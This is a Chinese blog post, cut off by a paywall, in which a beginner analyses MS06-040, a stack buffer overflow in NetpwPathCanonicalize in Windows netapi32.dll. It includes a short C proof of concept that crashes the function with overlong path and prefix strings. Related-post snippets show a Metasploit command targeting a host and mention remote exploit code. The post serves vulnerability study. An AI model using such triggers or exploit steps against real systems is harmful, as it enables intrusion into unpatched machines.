[漏洞分析] 漏洞分析:MS06-040

已于 2022-04-13 09:57:12 修改
阅读量1.1k 收藏
点赞数 1
文章标签: 经验分享
于 2022-04-13 09:37:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69551903/article/details/124140726
版权

最近开始学习漏洞分析相关内容,完成对Windows相关安全机制的学习后,便是寻找实例进行练习,这MS06-040是一个经典的栈溢出漏洞,原理很好理解,在此分享一下自己的分析过程,希望对同样是漏洞分析新手的同学有所帮助

 

 

漏洞存在于netapi32.dll中的导出函数NetpwPathCanonicalize()里,原型为:

int NetpwPathCanonicalize (
    uint16  path[ ],     //   [in]  path name
    uint8  can_path[ ],  //    [out]  canonicalized path
    uint32  maxbuf,      //  [in]  max size of can_path
    uint16  prefix[ ],   //  [in]  path prefix
    uint32*  pathtype,   //  [in out]  path type
    uint32  pathflags    //  [in]  path flags, 0 or 1
);

 

功能是将perfix和path用\字符拼接,输出到can_path中,输出字符串的容量是maxbuf这么大

 

漏洞触发的POC如下:

 

#include <windows.h>
typedef void (*MYPROC)(LPTSTR, LPTSTR, int, LPTSTR, long *, long);

int main() {
    char path[0x320];
    char can_path[0x440];
    int maxbuf = 0x440;
    char prefix[0x100];
    long pathtype = 44;

    HINSTANCE LibHandle;
    MYPROC Trigger;
    char dll[] = "./netapi32.dll";
    char VulFunc[] = "NetpwPathCanonicalize";
    LibHandle = LoadLibrary(dll);
    Trigger = (MYPROC)GetProcAddress(LibHandle, VulFunc);
    memset(path, 0, sizeof(path));
    memset(path, 'a', sizeof(path) - 2);
    memset(prefix, 0, sizeof(prefix));
    memset(prefix, 'b', sizeof(prefix) - 2);

    (Trigger)(path, can_path, maxbuf, prefix, &pathtype, 0);
    FreeLibrary(LibHandle);

    return 0;
}

 

代码是装在存在漏洞的netapi32.dll来调用漏洞函数进行复现漏洞

这里将path和prefix设置成长字符串来触发栈溢出,编译运行直到异常:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETkDoj6DokJ1fYm9sbw,size_20,color_FFFFFF,t_70,g_se,x_16

 发现执行到NetpwPathCanonicalize里的这个函数的时候,触发了异常

 

最低0.47元/天 解锁文章
菠萝_bolo
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
ms06-040漏洞分析1
08-08
3. 漏洞利用漏洞的利用分为本地和远程两种,本地利用用于分析此导出函数存在的漏洞,在远程靠此漏洞进行恶意代码执行,进而控制存在此漏洞的主机 4. 漏洞影响此例中
MS06-040漏洞研究(中)【转载】
weixin_30390075的博客
08-31 381
课程简介 经过上次的分析,我们已经知道了MS06-040漏洞的本质,那么这次我们就通过编程实现漏洞的利用。 课程介绍 实验环境: 操作机:Windows XP 实验工具: Tools Path IDA Pro ...
漏洞分析大全
最新发布
zyw268的博客
05-05 1068
​ XSS又叫CSS(Cross Site Script)跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。​ xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。种类:字符,数字,布尔,报错,延迟,联合,堆叠,宽字节,XFF等。
MS06-040漏洞研究(上)【转载】
weixin_30390075的博客
08-31 462
课程简介 我在之前的课程中讨论过W32Dasm这款软件中的漏洞分析与利用的方法,由于使用该软件的人群毕竟是小众群体,因此该漏洞的危害相对来说还是比较小的。但是如果漏洞出现在Windows系统中,那么情况就会很不一样了。毕竟Windows统治了全球九成以上的计算机操作系统,因此如果该系统中出现了漏洞,而这个漏洞又被别有用心者所利用,那么就必然会出现数以亿计的受害者。 课程介绍 ...
0day安全 学习之 MS06-040 漏洞研究
qq_41071646的博客
08-13 717
最近在看 0day安全 这本书 然后打算 跟着去复现一下 以前大一也试着看看这本书 发现看的不是很懂 现在感觉 这本书真的写的很棒 然后 我看了前三章 感觉都还ok 然后看到 一个漏洞的时候发现有点手痒 然后配了一下环境 找了一下dll 然后跟着来做一下, 然后这里的思路是来自 姜大大的 https://blog.csdn.net/ioio_jy/article/details...
MS06-040漏洞研究(下)【转载】
weixin_30390075的博客
08-31 283
课程简介 经过前两次的分析,我们已经对Netapi32.dll文件中所包含的漏洞成功地实现了利用。在系统未打补丁之前,这确实是一个非常严重的漏洞,那么打了补丁之后,这个动态链接库是不是就安全了呢?答案是否定的。即便是打了补丁,虽说我们之前所分析漏洞已被补上,但是这个程序中依旧存在着其它的问题。 课程介绍 实验环境: 操作机:Windows XP ...
深入浅出MS06-040
weixin_33800463的博客
01-19 243
  入浅出MS06-040 时至今日,网上已有颇多MS06-040的文章,当中不乏精辟之作。与其相比,本文突显业余,技术上无法超越,徒逞口舌之快。本文适合有一定计算机基础,初步了解溢出攻击原理,略微了解逆向技术的朋友阅读。假设您依据本文的指导亲手完毕了所有的7节实验内容,相信您对栈溢出的掌握和漏洞利用的认识一定会到一个更高的level。实验中涉及的所有细节均可重现,使用的源码都已经过具体的...
实训指导5.1.5操作系统漏洞攻击MS06-040(精)PPT文档.pptx
11-14
操作系统漏洞攻击是网络安全领域中的一个重要话题,特别是在这个实训指导中,重点讨论了针对MS06-040漏洞的溢出攻击。MS06-040,也被称为“网络堆栈溢出漏洞”,是微软Windows操作系统中一个知名的漏洞,它主要影响...
信息安全技术基础:Windows系统缓冲区溢出漏洞利用(MS06-040).doc
11-01
信息安全技术基础
MS06-040溢出套装
10-31
MS06-040溢出套装】是针对2006年微软发布的一个重要安全更新的漏洞利用工具集合。这个套装主要关注的是Windows操作系统中的一个严重安全问题,该问题被称为“网络堆栈缓冲区溢出”或“MS06-040漏洞”。这个漏洞...
深入浅出MS06-040(看雪网络版)
12-19
深入浅出分析漏洞MS06-040,值得一看
MS06040漏洞扫描工具
06-17
MS06040漏洞扫描工具,若无法运行,尝试用windows2000兼容性运行。
MS06040漏洞扫描器
10-31
MS06040漏洞扫描器 通过445端口的入侵工具
MS06-040 Remote Code Execution Proof of Concept
08-26 1915
 /* * MS06-040 Remote Code Execution Proof of Concept * * Ported by ub3r st4r aka iRP * --------------------------------------------------------------------- * Tested Against: *  Windows XP SP1 *  Win
MS06-040漏洞分析回顾
Walter的专栏
09-12 2835
1、利用现有win2000 sp4系统的netapi32.dll发现目前大多数系统已经打上补丁,带补丁的ida代码如下: signed int __stdcall NetpwPathCanonicalize(wchar_t *Str, wchar_t *lpWideCharStr, int a3, wchar_t *Source, int a5, int a6) {   wchar_t *v
Ubuntu10.04下使用metasploit对win2000 server进行MS06-040溢出
收集盒 Book box
09-14 2239
msf > use exploit/windows/smb/ms06_040_netapi msf exploit(ms06_040_netapi) > set RHOST 192.168.121.129 RHOST => 192.168.121.129 msf explo
《0day安全》 RPC 入侵:MS06-040 与 MS08-067
weixin_50287973的博客
10-14 451
RPC 简介 在分布式计算,远程过程调用(英语:Remote Procedure Call,缩写为 RPC)是一个计算机通信协议。 该协议允许运行于一台计算机的程序调用另一个地址空间(通常为一个开放网络的一台计算机)的子程序,而程序员就像调用本地程序一样,无需额外地为这个交互作用编程(无需关注细节)。 RPC是一种服务器-客户端(Client/Server)模式,经典实现是一个通过发送请求-接受回应进行信息交互的系统。 如果涉及的软件采用面向对象编程,那么远程过程调用亦可称作远程调用或远程方法调用,例:Ja
暴风一号蠕虫病毒怎么攻击计算机的
04-29
暴风一号蠕虫病毒是一种计算机网络蠕虫病毒,它主要通过利用计算机系统中的漏洞或弱点进行攻击。它的攻击方式如下: 1. 利用系统漏洞:暴风一号蠕虫病毒利用了许多 Windows 系统的漏洞,如 MS08-067、MS06-040、MS05-039 等,通过这些漏洞,它可以自动向其他计算机发送感染程序。 2. 利用网络共享:暴风一号蠕虫病毒可以利用网络共享来感染其他计算机,它会搜索网络共享目录,并将感染程序复制到共享目录中。 3. 利用邮件传播:暴风一号蠕虫病毒可以利用邮件传播,它会在邮件正文中包含恶意代码,并通过邮件附件传播。 4. 利用 USB 设备传播:暴风一号蠕虫病毒可以利用 USB 设备来传播,它会将感染程序复制到插入的 USB 设备中,然后在其他计算机上运行。 一旦感染了计算机,暴风一号蠕虫病毒会通过网络连接到控制中心,并等待远程控制指令。攻击者可以利用这些指令来执行各种恶意活动,如窃取敏感信息、传播其他恶意软件等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

菠萝_bolo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值